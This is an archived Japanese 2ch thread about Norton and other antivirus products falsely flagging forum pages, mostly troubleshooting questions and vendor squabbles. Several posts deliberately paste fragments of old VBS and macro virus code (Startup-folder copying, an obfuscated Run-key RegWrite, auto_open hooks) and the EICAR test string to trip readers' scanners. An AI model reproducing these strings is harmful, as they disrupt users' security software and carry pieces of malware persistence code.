ノートン誤作動対策本部
URLリンク(qb5.2ch.net)

>>707 NIS2006はよくわからないけど上のリンクとスレ参考にしる。


723:ひよこ名無しさん
06/10/14 00:28:20 .net
>>713
ありがとうございます。
教えて頂いたURLリンク(mickey.mirv.net)
やってみて、まただめな様なら
また来ます。ありがとうございました。

724:ひよこ名無しさん
06/10/14 14:20:25 .net
ノートンが反応して、偽ウイルスを削除した場合
何かPCに問題は起こるんですか?

725:715
06/10/14 14:25:05 .net
ウイルスを削除というか、駆除できずにファイル(?)ごと削除してるんですけど。。。
ご指導お願いします。

726:ひよこ名無しさん
06/10/14 14:35:27 .net
>>715
起こらない
>>716
2chのログファイル、またはIEキャッシュファイルを監視対象から除外

727:715
06/10/14 14:41:13 .net
>>717
ありがとうございます。
具体的には、何を削除しているのでしょうか。

例えば、以下のようなものが削除されてしまいます。
Documents and Settings \ 名前 \ Local Settings
\ Temporary Internet Files \ Content IES \ SOUTTMDI2 \ l50[1].htm

728:ひよこ名無しさん
06/10/14 17:15:19 .net
>>718
IEキャッシュファイル

729:715
06/10/14 19:03:51 .net
てことは削除されてもまったく問題ないんですよね?
ありがとうございました!

730:ひよこ名無しさん
06/10/16 19:13:08 .net
VShieldを有効にするってどうしたらいいんですか?

731:ひよこ名無しさん
06/10/17 12:47:03 .net
>>257
自分も>>259さんと同じで
こういうの貼られてたら、暫く板が開けなくなります・・
【質問】
1:ノートン使って専ブラで見ている人は、みんな実行しているのでしょうか?

2:そこでやはり↓のサイトの対処法をしないといけないのでしょうか?
 URLリンク(mickey.mirv.net)

いまいち、やるのが怖くて躊躇しているのですが・・
(ウイルスとかが)

WinXPsp2 Jane doe style2.41を使っています

732:ひよこ名無しさん
06/10/17 20:07:44 .net
別に怖いことないと思うが。
設定の意味がわからないとか漠然とした不安があるのでしょうか。
抵抗があるなら>>689にある誤反応スクリプト無効化ソフトを使って
その都度対処すれば良いと思います。

733:ひよこ名無しさん
06/10/17 23:17:55 .net
実行しなければ自分が不便な思いをするだけ

不便でも構わない、
危険はないと説明されても納得できない、
とにかく怖いというなら好きにすれば?

734:ひよこ名無しさん
06/10/22 10:00:55 .net
保守

735:ひよこ名無しさん
06/10/28 17:40:52 RthPMJHm.net
2007は誤反応しなくなったんですか?
エロイ人教えて

736:ひよこ名無しさん
06/11/03 06:52:18 .net
保守

737:私立の中学生 ◆N30ctwWJLw
06/11/04 20:07:16 .net
バスターという最高のアンチウィルスがありながらどうして人はノートンを選ぶんだろう

738:ひよこ名無しさん
06/11/05 03:48:08 .net
最高のアンチウィルスw

739:ひよこ名無しさん
06/11/07 01:49:05 .net
誘導

740:ひよこ名無しさん
06/11/07 12:15:11 .net
>>728
バスターはOSを起動できなくしたという前科があるからいまいち信用できない。

741:ひよこ名無しさん
06/11/13 16:36:48 286EntMo.net
>>728
>>731
前科どころか、2007は起動時にOSごとフリーズさせる実績があるから
たとえ誤反応が多くても、農豚をオススメする。

742:ひよこ名無しさん
06/11/16 10:01:34 ajN9y2Qm.net
なんかメジャーじゃない誤反応ソースないかなー

743:ひよこ名無しさん
06/11/16 10:40:15 .net
URLリンク(www.google.co.jp)

744:ひよこ名無しさん
06/11/17 10:54:47 .net
ノートンのウィルス誤反応警告の表示警告がここ2、3日で変わったのは自分だけ?
念のためにプロバイダサービスによるマカフィーも使って調べても、
ウィルスなど異常が見受けられなかったのに。

745:ひよこ名無しさん
06/11/18 14:53:59 .net
恵比寿視力回復研究所八王子クリニック大塚美容形成外科・歯科今泉ハートクリ
ニック朝日大学歯学部附属村上記念病院加藤内科クリ
ニックあんのうらクリニック今津赤十字病院佐賀県立病院好生館安芸市民病院お
きた内科クリニックしお医院静岡県立総合病院相生山
病院愛知県がんセンターあきしまクリニック岩崎病院高茶屋診療所国立病院機構
三重中央医療センター井上記念病院小倉台柏戸クリニ
ックうたせメディカルクリニックたちばな台病院青葉台病院恵比寿視力回復研究
所八王子クリニック大塚美容形成外科・歯科今泉ハー
トクリニック朝日大学歯学部附属村上記念病院加藤内科クリニックあんのうらク
リニック今津赤十字病院佐賀県立病院高月整形外科好
生館安芸市民病院おきた内科クリニックしお医院静岡県立総合病院相生山病院愛
知県がんセンターあきしまクリニック岩崎病院高茶屋
診療所国立病院機構三重中央医療センター井上記念病院小倉台柏戸クリニックう
たせメディカルクリニック橋本内科医院市立芦別病院
北海道立本岐こじま内科額賀医院よこぎ内科胃腸科クリニック平中央医院いわき
市国民健康保険田人診療所中野中央病院佐藤医院野崎
整形外科医院高木医院木村クリニック洋向台クリニックくさの内科・眼科すけが
わ内科クリニック額賀医院草野医院下遠野内科胃腸科

746:ひよこ名無しさん
06/12/18 04:28:15 X+EF3ZXu.net
昨夜から急にanime鯖だけ繋がらなくなりました。
原因を探していたら、このスレを見つけたので質問させて下さい。

使用ソフト、NortonAntiVirus2006
2ch閲覧環境、IE6.0とOpenJane
症状、anime鯖の閲覧不可
専ブラでのエラー報告、SocketError#10065 Norou te to host.

誤反応スクリプト無効化ソフト導入と除外設定は済ませています。
試しにAuto-Protectをオフにしてみたのですが、それでも閲覧できませんでした。
どうすれば問題を


747:解決できるんでしょうか。どなたかアドバイスお願いしますorz



748:737
06/12/18 05:25:17 .net
自己解決しました
30分規制にかかっていただけみたいです

749:ひよこ名無しさん
06/12/19 05:26:43 PWq98QOy.net
ログフォルダは除外していたのですが、2chのスレを開いてて
ウィルス警告が出たので、またいつもの誤反応だと思い。
Temporary Internet Filesをスキャンしたら1158448744[1].htm にVBS.Freelink.B
が見つかって「検疫」「削除」をしても駆除できません。
これもただの誤反応なのでしょうか?

750:ひよこ名無しさん
06/12/19 17:32:58 .net
ただの誤反応です
専ブラではなくIEでスレッドを閲覧したのが原因で、
>>1に書いてある通り、別に心配ありません
Temporary Internet Filesを除外したりしてはいけません
(>>1以下、テンプレの各リンク先もよく読みましょう)

751:ひよこ名無しさん
06/12/20 18:18:36 .net
ノートンを2007に更新したらいろいろ探してもノートントラップを防ぐための
セキュリティから除外する方法がわからないんですが、どうやってノートントラップを防げばいいんですか?

752:ひよこ名無しさん
06/12/20 20:25:49 .net
これは?
スレリンク(sec板:12番)

753:ひよこ名無しさん
07/01/01 23:25:35 .net
Window Live OneCareに乗り換えたらぴくりとも反応しなくなったよ
未だにウイルスコードに手焼いてるのかよ、お前ら

今こそ天下無敵OS界の重鎮Microsoft様が作ったLive OneCareに乗り換えろよw
どうせ数年で他のウイルスソフトは駆逐されるぜ
早いうちに乗り換えといた方が吉!

今なら85日無料版が使えるよ
URLリンク(ideas.live.com)

製品版は1月31日発売
価格はなんとamazonで買えば3000円ぐらいだったはず
URLリンク(www.amazon.co.jp)
しかも、3つのPCにインストールしてもいいという大サービス

さあ、みんなWindows Live OneCareに乗り換えよう!!!

754:ひよこ名無しさん
07/01/02 17:07:44 .net
MS社員、乙www


755:ひよこ名無しさん
07/01/03 11:52:11 LGlxtRKd.net
禁断の壷を開きながらスレを開くと、ログファイルが開けないよ、ログを削除
してみてとなるのはどうして?

756:ひよこ名無しさん
07/01/03 11:59:10 .net
>>743
ワロタ

757:<body onload=window()>
07/01/15 22:48:03 .net
           YES → 【ヒットした?】 ─ YES → じゃあ聞くな。
         /                \  
【検索した?】                     NO → 【半年検索した?】─ YES → 諦めろ。
         \                                   \
            NO → 死ね                            NO → しろ。
                 ↓  
                    /!/{  / ヾ--r
                 _  /     ̄    <_
               _.>`´        __<
    ノ ̄ ̄`ヽ、―ニ   >    r‐'" ̄ ̄     ヽ 、―ニ
  / ´`ヽ _  三,:三ー/ ,    |  `ヽ _       三,:三ー
 .ノヽ--/ ̄ ,    `    ̄/    |   ノ   ` ̄ ̄ ̄ ̄ ̄
  }  ...|  /!        / /⌒ヽ,|  ミ }
  }`ー‐し'ゝL _      レ l d     _}
  ヘr--‐‐'´}    ;ーー- | ヽ、_,   _,:ヘヽ-------------
   `ヾ---‐'ーr‐'"== .|/|  \          r= ==-
                  ヽ/l/|` ー------r‐'"    ̄ ̄
                     |└-- 、__/`\-:、
                    __,ゝ,,_____/ \_」 \




758:ひよこ名無しさん
07/01/15 22:56:11 .net
もう貼れないらしいじゃない

759:ひよこ名無しさん
07/03/23 14:06:17 jA8acnC0.net
キタ━━━(゚∀゚)━━━ !!!!!


Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"


760:ひよこ名無しさん
07/03/23 16:11:12 8JkeNaro.net
初心者ですが、CAアンチウイルス2007というウイルス対策ソフト
買ったのですが、長々と使用許諾契約書いてありますが後で何か
送られてくるとかないですよね。

761:ひよこ名無しさん
07/03/23 19:23:51 .net
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

762:ひよこ名無しさん
07/03/29 11:24:43 .net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
???????


763:ひよこ名無しさん
07/04/12 21:26:57 .net
こうじやりおれ

Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"


764:ひよこ名無しさん
07/04/22 21:10:05 JYgcqMsk.net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub


765:ひよこ名無しさん
07/06/05 22:27:47 .net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

766:ひよこ名無しさん
07/09/04 22:04:28 PUX2nD+8.net
ウイルスバスターはフリーのアンチウイルスにも劣る脅威の低検出率だった!!!!!

★権威あるAV-Test.org最新結果 (07/8/21ブログエントリー、874,822検体。

1.AVK 2007  99.88% (△0.32%, 2↑)
2.WebWasher  99.86% (△0.03%、1↓)
3.BitDefender  99.51% (△3.88%. 11↑)
4.AntiVir     99.29% (▼0.13%) 3↓)
5.Kaspersky   98.86% (△1.22%、6↑)
6.F-Secure   97.93% (±0.00%,4↓)
7.Avast!    96.99%(△0.67%, 8↑))
8.AVG      96.81% (△0.66%, 9↑)
9.Symantec  96.75% (▼1.02%, 5↓)
10.Microsoft  96.42% (△15.86%, 23↑)
12.Sophos   94.63% (△12.88%.21↑)
13.Nod32   94.26% (△5.94%、16↑)
15.Mc.Afee   93.71% (△ 6.43%、17↑)
17.Rising    90.43% (▼5.59%、10↓)

19.Trend Micro 88.85% (▼2.12%, 15↓)10個に1個以上はスルーする計算!もはや何の役にも立ちません!
    ∩___∩   /)
    | ノ      ヽ  ( i )))
   /  ●   ● | / /
   |    ( _●_)  |ノ /   ここクマ―!!
  彡、   |∪|    ,/
  /__  ヽノ   /´
 (___)     /

URLリンク(blog.chip.de)

G-DATA>BitDefender>AntiVir(フリー)>Kaspersky>F-Secure>Avast!(フリー)>AVG(フリー)>Symantec>Microsoft>>
NOD>McAfee>>Rising(キラー)>>>>>我らがウイルスバスター2007

767:ひよこ名無しさん
07/09/04 22:05:16 .net
★セキュリティ板本スレ

【VB】ウイルスバスター2007 Part36【TrendMicro】
スレリンク(sec板)

【VB】ウイルスバスター2008 Part1【TrendMicro】
スレリンク(sec板)

【VB】ウイルスバスター2006 Part27【TrendMicro】
スレリンク(sec板)

★セキュリティ板主要スレ・比較スレ

【500】一番いいセキュリティソフトはなんだ!Part33
スレリンク(sec板)

ウイルスバスター VS ノートン
スレリンク(sec板)

ウイルスバスターくん?マカフィーちゃん?ノートンさん?誰が好き?
スレリンク(sec板)

nortonとウイルスバスターってどっちが良いの?(パソコン一般)
スレリンク(pc板)

★最悪製品スレ

一番最悪なセキュリティソフトって何よ?
スレリンク(sec板)

最も不具合が少ない・多いセキュリティソフト
スレリンク(sec板)

768:ひよこ名無しさん
07/09/04 22:05:46 .net
★ウイルスバスター・トレンドマイクロ悪評・糾弾スレ(1)

ウイルスバスター重い遅い不具合トラブルエラーバグ固まる低性能
スレリンク(sec板)

ウィルスバスター2007って明らかに欠陥品じゃね?
スレリンク(sec板)

ウイルスバスターって明らかに欠陥品じゃね? 2
スレリンク(sec板)

最悪ウイルスバスター2007
スレリンク(sec板)

トレンドマイクロにだまされちゃった(ソフトウェア)
スレリンク(software板)

ウイルスバスターってただのぼったくりの糞?(ビジネスsoft)
スレリンク(bsoft板)

ウイルスバスターはマジ地雷 重い遅い不具合低検出悪評判(パソコン一般)
スレリンク(pc板)

「500」「バスター厨」「相模原」粘着荒らし総合スレ
スレリンク(sec板)

769:ひよこ名無しさん
07/09/04 22:06:52 .net
★ウイルスバスター・トレンドマイクロ悪評・糾弾スレ(2)

ウィルスバスター(笑)
スレリンク(sec板)

トレンドマイクロ社製品不買運動しないか?
スレリンク(sec板)

トレンドマイクロいい加減にしろ
スレリンク(sec板)

トレンドマイクロ「医者の不養生」 社員PCが感染
スレリンク(sec板)

トレンドマイクロ「( ´,_ゝ`) 賠償?しねぇよ(笑)」
スレリンク(sec板)

何故ウイルスバスターは馬鹿にされるのか
スレリンク(sec板)

トレンドマイクロ代表取締役社長兼CEOエバ・チェン
スレリンク(sec板)

770:ひよこ名無しさん
07/10/03 15:31:28 +kM5mjs3.net
性能はどうなのか?↓

URLリンク(yasuipc.jp)

771:ひよこ名無しさん
07/10/19 00:10:53 .net
このスレの784なんだけど
スレリンク(base板)
これ貼られてから先生が怒った後にログ読み込んだらレスが見えなくなった(ちなみにLive2ch)
適当に文字列NGワードに突っ込んだらまたログ読めるようになったけど…これは何なんだ?

772:ひよこ名無しさん
07/10/21 12:43:31 .net
スレ見ようと思ったらカスペでトロイが検出されちゃった
誰か直し方知らない?
探したけどカスペのスレなかったんで…

773:ひよこ名無しさん
07/12/22 22:23:47 .net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))

774:ひよこ名無しさん
08/02/22 23:21:24 vqQGnXVt.net
ここにいろいろあって
VBS.LoveLetter.Ver
VAS.Freelink..B
に反応しますた

775:ひよこ名無しさん
08/02/22 23:21:59 .net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))

776:ひよこ名無しさん
08/03/31 14:33:48 .net
>>762>>764
は同じ人かな?

カスペのメニュー画面で
[ファイルアンチウィルス]→[設定]→[カスタマイズ]
を選択。
開いた窓の(ファイル形式)項目にある
「プログラムとドキュメント」
を選択すればいいと思う。デフォルトでは「すべて」になってるはず。
どちらを選ぶかはヘルプ見て自己判断。

777:ひよこ名無しさん
08/04/30 09:49:52 .net
(?

778:ひよこ名無しさん
08/05/21 00:53:21 +x91/koU.net
INS2008の設定はどうすればいいんですか?

779:ひよこ名無しさん
08/10/22 22:41:20 .net
NIS2004を使用している人に聞きたいのですが、拡張→ブラウザについての情報を遮断に設定すると強制フシアナになりますか?

780:ひよこ名無しさん
09/05/15 22:17:59 +Tq9cO+7.net
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))

781:ひよこ名無しさん
09/07/11 22:35:51 Rb1uHfri.net
avast!がこのスレに誤飯能 死ね

782:ひよこ名無しさん
09/07/11 22:38:34 .net
 Windows 2000にシステムの復元を薦める無職俟倶大犂 ◆UlRxjIbrcg蚤
           ↓

          ______
         /:::::::::::::::::::::\
       /::::::::::::::::::::::::::::::::\
       |::::::::::::::::       | 
       |::::::::::::::: ∪ ⌒  ⌒)
       |::( 6::     `  ´ |
        ノ::: (∵∴∪ ( ・ ・))   ゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜゚・*
     /      ∵   3 丿   ボクやる事2ちゃんで粘着自演だけだよっぷ ・・・・・・・・
    /\    U   ___ノ         *・゜゚・*:.。. .。.:*・゜゚・*:.。. .。.:*・゜
  /   .\     ____ノ\
        \______ノ  .\

627 名前:ひよこ名無しさん[] 投稿日:2006/09/22(金) 21:24:37 ID:JqmRq+n+
603 2kです。入力しても。コマンドまたはファイル名が違います。とでます。

637 名前:俟倶大犂 ◆UlRxjIbrcg [sage    ?] 投稿日:2006/09/22(金) 21:32:29 ID:???
>>627
少し思い出したので参考に買いくお
セーフモードが立ち�


783:繧ェることからコマンドプロンプトを選択して %systemroot%\system32\restore\rstrui.exe と入力してエンターで復元してみる手もあるかな あい



784:ひよこ名無しさん
09/09/18 04:14:29 rSQV8+LU.net
2009だけど
最近 2ちゃんねるのスレを開くたんびに(2ちゃんねるビューアはつかってません)
ノートンが 「安全なサイトではありません」 とでるんだけど
なんで最近急にでだしたのでしょうか?
あと出ないようにする対策もおしえてください

785:ひよこ名無しさん
09/09/18 04:19:02 rSQV8+LU.net
2009だけど
最近 2ちゃんねるのスレを開くたんびに(2ちゃんねるビューアはつかってません)
ノートンが 安全なサイトではありません とでるんだけど
なんで最近急にでだしたのでしょうか?
あと出ないようにする対策もおしえてください


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch